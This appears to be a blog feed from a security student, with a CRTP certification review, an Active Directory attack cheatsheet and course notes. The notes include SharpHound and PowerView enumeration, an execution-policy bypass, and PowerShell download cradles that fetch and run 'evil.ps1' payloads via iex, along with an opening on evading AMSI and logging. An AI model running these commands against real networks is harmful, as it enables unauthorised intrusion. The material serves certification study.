https://4ym3nn.github.io/tags/active-directory/Recent content in Active Directory onHugoen-usTue, 09 Jun 2026 17:40:00 +0100https://4ym3nn.github.io/reviews/crtp-review/Tue, 09 Jun 2026 17:40:00 +0100https://4ym3nn.github.io/reviews/crtp-review/<h1 id="certified-red-team-professional-crtp-review">Certified Red Team Professional (CRTP) Review</h1> <p>I am proud to share that I have successfully passed the Certified Red Team Professional (CRTP) exam!</p> <p align="center"> <img src="https://4ym3nn.github.io/images/crtp-certificate.png" alt="Certified Red Team Professional (CRTP)" /> </p> <hr> <h2 id="context">Context</h2> <p>I won the CRTP certificate voucher in the <strong>WorldWideCTF</strong> competition with my team <strong>TroJeun</strong>. I started the course with zero knowledge about Active Directory in March 2026. I tackled the material slowly, focusing on the videos, understanding the author&rsquo;s workflows, and adopting the mindset of attacking AD.</p>https://4ym3nn.github.io/reviews/crtp-cheatsheet/Tue, 09 Jun 2026 17:36:00 +0100https://4ym3nn.github.io/reviews/crtp-cheatsheet/<p>Source: cleaned from <code>sheet.md</code> only. Commands were deduplicated where repeated verbatim. No techniques were added beyond the original notes.</p> <h2 id="bloodhound-collection">BloodHound Collection</h2> <pre tabindex="0"><code>./SharpHound.exe --collectionmethods All --excludedcs </code></pre><pre tabindex="0"><code>./sharp.xe --collectionmethods Group,GPOLocalGroup,Session,Trusts,ACL,Container,ObjectProps,SPNTargets,CertServices --excludedcs </code></pre><pre tabindex="0"><code>C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SharpHound\SharpHound.exe - args --collectionmethods Group,GPOLocalGroup,Session,Trusts,ACL,Container,ObjectProps,SPNTarg ets,CertServices --excludedcs </code></pre><h2 id="execution--session-prep">Execution / Session Prep</h2> <p><strong>PowerShell</strong> Bypass PowerShell execution policy restrictions for the current shell.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-powershell" data-lang="powershell"><span style="display:flex;"><span>powershell -ExecutionPolicy bypass </span></span></code></pre></div><p><strong>InviShell</strong> Launch InviShell without requiring admin.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bat" data-lang="bat"><span style="display:flex;"><span>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat </span></span></code></pre></div><h2 id="enumeration">Enumeration</h2> <p><strong>PowerView</strong> List domain user <code>samaccountname</code> values.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-powershell" data-lang="powershell"><span style="display:flex;"><span>Get-DomainUser | select -ExpandProperty samaccountname </span></span></code></pre></div><p><strong>PowerView</strong> List domain computers by DNS hostname.</p>https://4ym3nn.github.io/reviews/crtp-summary/Tue, 09 Jun 2026 17:35:00 +0100https://4ym3nn.github.io/reviews/crtp-summary/<h1 id="1-powershell-basics">1. PowerShell Basics</h1> <h2 id="importing-modules">Importing Modules</h2> <ul> <li>Load a PowerShell script using <strong>dot sourcing</strong>:</li> </ul> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-powershell" data-lang="powershell"><span style="display:flex;"><span>. C:\AD\Tools\PowerView.ps1 </span></span></code></pre></div><ul> <li>A module (or a script) can be imported with:</li> </ul> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-powershell" data-lang="powershell"><span style="display:flex;"><span>Import-Module C:\AD\Tools\ADModulemaster\ActiveDirectory\ActiveDirectory.psd1 </span></span></code></pre></div><ul> <li>All the commands in a module can be listed with:</li> </ul> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-powershell" data-lang="powershell"><span style="display:flex;"><span>Get-Command -Module &lt;modulename&gt; </span></span></code></pre></div><h2 id="powershell-script-execution---download-cradles">PowerShell Script Execution - Download Cradles</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-powershell" data-lang="powershell"><span style="display:flex;"><span>iex (New-Object Net.WebClient).DownloadString(<span style="color:#e6db74">&#39;https://webserver/payload.ps1&#39;</span>) </span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-powershell" data-lang="powershell"><span style="display:flex;"><span>$ie=New-Object -ComObject </span></span><span style="display:flex;"><span>InternetExplorer.Application;$ie.visible=$False;$ie.navigate(<span style="color:#e6db74">&#39;http://192.168.230.1/evil.ps1&#39;</span>);sleep <span style="color:#ae81ff">5</span>;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response </span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-powershell" data-lang="powershell"><span style="display:flex;"><span><span style="color:#75715e"># PSv3 onwards</span> </span></span><span style="display:flex;"><span>iex (iwr <span style="color:#e6db74">&#39;http://192.168.230.1/evil.ps1&#39;</span>) </span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-powershell" data-lang="powershell"><span style="display:flex;"><span>$h=New-Object -ComObject </span></span><span style="display:flex;"><span>Msxml2.XMLHTTP;$h.open(<span style="color:#e6db74">&#39;GET&#39;</span>,<span style="color:#e6db74">&#39;http://192.168.230.1/evil.ps1&#39;</span>,$false);$h.send();iex </span></span><span style="display:flex;"><span>$h.responseText </span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-powershell" data-lang="powershell"><span style="display:flex;"><span>$wr = [<span style="color:#66d9ef">System.NET.WebRequest</span>]::Create(<span style="color:#e6db74">&#34;http://192.168.230.1/evil.ps1&#34;</span>) </span></span><span style="display:flex;"><span>$r = $wr.GetResponse() </span></span><span style="display:flex;"><span>IEX ([<span style="color:#66d9ef">System.IO.StreamReader</span>]($r.GetResponseStream())).ReadToEnd() </span></span></code></pre></div><hr> <h1 id="2-powershell-security--evasion">2. PowerShell Security &amp; Evasion</h1> <h2 id="powershell-detections">PowerShell Detections</h2> <ol> <li><strong>System-wide transcription</strong></li> <li><strong>Script Block logging</strong></li> <li><strong>AMSI</strong></li> <li><strong>CLM</strong> - Integrated with AppLocker and WDAC (Device Guard)</li> </ol> <h2 id="bypassing-powershell-security">Bypassing PowerShell Security</h2> <p><strong>Using Invisi-Shell:</strong></p>